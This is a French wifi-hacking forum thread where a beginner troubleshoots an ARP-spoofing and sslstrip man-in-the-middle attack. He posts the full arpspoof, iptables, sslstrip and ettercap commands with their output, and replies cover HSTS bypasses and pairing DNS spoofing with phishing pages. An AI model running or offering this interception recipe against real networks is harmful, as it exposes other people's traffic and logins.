Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-01-2016 16:05:01

FritillaX
Membre
Inscription : 06-09-2015
Messages : 12

MITM avec sslstrip (Problème débutant linux)

Bonjour,
   J'ai voulu essayer de faire un "man in the middle" avec sslstrip mais sans resultat. Quand je lance arpspoof et sslstrip le PC-victime ne peux plus naviguer sur le web et un message d'erreur apparais (L'authenticité des données reçues ne peut être vérifié). Je tiens a preciser que j'ai également suivis les 2 tutos sur le site qui sont très bien fait smile mais hélas sans résultat ...


OS utilisé: kali linux 2 et debian 8
carte réseau:
wlan0 == carte réseau interne du PC
wlan1 == Carte réseau usb alfa network awus036NH

         monIP: 192.168.0.55
IP de la cible: 192.168.0.31
IP du routeur: 192.168.0.1

prérequis: J'ai modifiée le fichier /etc/ettercap/etter.conf  en enlevant les 2 # devant les 2 redir_command_... se qui donne:
# if you use iptables:
     redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
     redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

[email protected]:~# echo "1" > /proc/sys/net/ipv4/ip_forward
[email protected]:~# cat /proc/sys/net/ipv4/ip_forward
1
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
[email protected]:~# iptables -t nat -L

Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:http redir ports 10000

[email protected]:~# arpspoof -i wlan1 -t 192.168.0.31 192.168.0.1
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb
34:e6:ad:12:c3:bb 6c:b0:ce:b0:68:12 0806 42: arp reply 192.168.0.31 is-at 34:e6:ad:12:c3:bb

Dans un autre terminal

[email protected]:~# sslstrip -a -k -f

sslstrip 0.9 by Moxie Marlinspike running...

Dans un autreterminal

[email protected]:~# ettercap -T -q -i wlan1


ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
 wlan1 -> 00:C0:CA:57:9B:93
	  192.168.0.55/255.255.255.0
	  fe80::2c0:caff:fe57:9b93/64

Privileges dropped to EUID 65534 EGID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Merci d'avance pour votre aide

Dernière modification par FritillaX (06-01-2016 17:31:06)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-01-2016 22:18:39

guillaume
Nouveau membre
Inscription : 27-12-2014
Messages : 6

Re : MITM avec sslstrip (Problème débutant linux)

Salut Fritilla X!!

En fait, tes commandes sont justes (je pense mdr), le problème vient de sslstrip (je pense aussi).  Sslstrip ne fonctionne plus sur certains sites (gmail, paypal)...

C'est à cause d'un problème récent: Les navigateurs récents comme chrome ou firefox ont défini des sites (gmail, paypal...) dans lesquels la connection en https est OBLIGATOIRE. Le navigateur refusera de se connecter à certains sites en http, même si on l'y force ou on le trompe(sslstrip par exemple).

Néanmoins, il y a une faille à cette "liste obligatoire", mais si
tu veux l'exploiter va falloir bossser (elle est expliquée dans la référence que je te mets juste après).

C'est cet article qui m'a permis de comprendre ce principe et qui t'aidera:
https://antaresnotebook.wordpress.com/2 … o-gagnant/


Le HSTS est aussi un problème, mais je ne suis pas sur qu'il gêne sslstrip. C'est une norme activée sur certains sites qui oblige le client à se connecter en https à celui-ci. Le HSTS foncitonne simplement. Lors de la première connexion du client en HTTP (si le client essaie d'établir une connection en HTTP), le serveur envoie dans ses requêtes des lignes de code qui disent en gros: "utilise le https pour communiquer avec moi". Donc le client essaiera donc de parler naturellemnt en https avec le serveur. Néanmoins, comme sslstrip établit une connection https et non http avec le serveur, ça ne devrait pas poser de problèmes (à part si dans la requête https il y a aussi des lignes de code demandant encore à l'ordi client de communiquer en https ?).
Enfin bref, même pour le HSTS, il y a des failles qui permettent de le contourner simplement (supprimer les headers où il y a les lignes de code grâce à des logiciels comme sergio proxy (mais ça nécessite des bases en html)), je te renvoie encore à mon lien au dessus ou à cet article http://hackademics.fr/showthread.php?45 … -pour-MITM

Bref, si tu es sur le même réseau de la cible, en résolvant ces deux problèmes, tu devrais même pouvoir écouter les échanges simplement avec wireshark!


Ou alors, en combinant sslstrip (légèrement modifié je pense) avec du dns spoofing qui redirige vers une fausse page du site (phishing), tu devrais peut être arriver à tes fins sans t'occuper du problème des "listes fixes des navigateurs" ! mais il faudra comme même résoudre le problème du hsts grâce à sergio proxy ou autre logiciel !!

BONNE CHANCE!

guillaume, !

Hors Ligne

#3 07-01-2016 07:53:41

FritillaX
Membre
Inscription : 06-09-2015
Messages : 12

Re : MITM avec sslstrip (Problème débutant linux)

Merci pour ta réponce, je vais voir tous sa et voir aussi si j'ai le niveau (sinon je bosserais pour l'avoir tongue )

Et du coup comme tu penses que c'est a cause du navigateur, j'esseraie se week-end chez un ami allèrgique au mise a jour lol .
Mais il y a quand même le fait que ce sont toutes les pages web qui ne fonctionnent pas et pas seulement gmail, paypal...
En tous cas merci pour tous big_smile

Hors Ligne

#4 07-01-2016 19:18:21

FritillaX
Membre
Inscription : 06-09-2015
Messages : 12

Re : MITM avec sslstrip (Problème débutant linux)

Effectivement je ne suis pas au niveau roll
Par contre je ne pense pas que mon problème vienne de là (du moins pour l'instant). Je m'explique, je me suis apperçu que je pouvais naviguer sur les pages www. (non cryptées) mais dès que la page est crypté sa affiche le message d'erreur      ex: https://www.google.fr/   -------->    Secure Connection Failed
donc a moins que google, duck duck go, openclassroom... utisent HSTS il doit y avoir un autre problème hmm
je me suis aussi apperçu que si j'arrêtais ettetcap je pouvais naviguer de nouveau sur les pages https. MAIS tongue
je n'ai pas les pages https "décrypte" dans wireshark ou tcpump.

Hors Ligne

#5 07-01-2016 19:41:07

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : MITM avec sslstrip (Problème débutant linux)

Le lien que t'a donné Guillaume, devrait te faire comprendre pourquoi wink


Le blog d'Antares145, est très explicite sur la chose wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#6 08-01-2016 17:19:27

FritillaX
Membre
Inscription : 06-09-2015
Messages : 12

Re : MITM avec sslstrip (Problème débutant linux)

J'ai bien lu la doc. même 2 fois tongue  mais comme je le pense toujours je crois que c'est un autre problème, j'esserais de vous expliquer se qui me fait penser sa mais plus tard, je dois retourner a mes études principal ceci était un petit bonus mais il est bien plus complexe que se que je croyais tongue
En tous cas Merci pour vos réponces et pour les liens smile

PS: je reviendrais vous embêter des que je sais configurer un serveur DNS et DHCP.

Dernière modification par FritillaX (08-01-2016 17:22:51)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]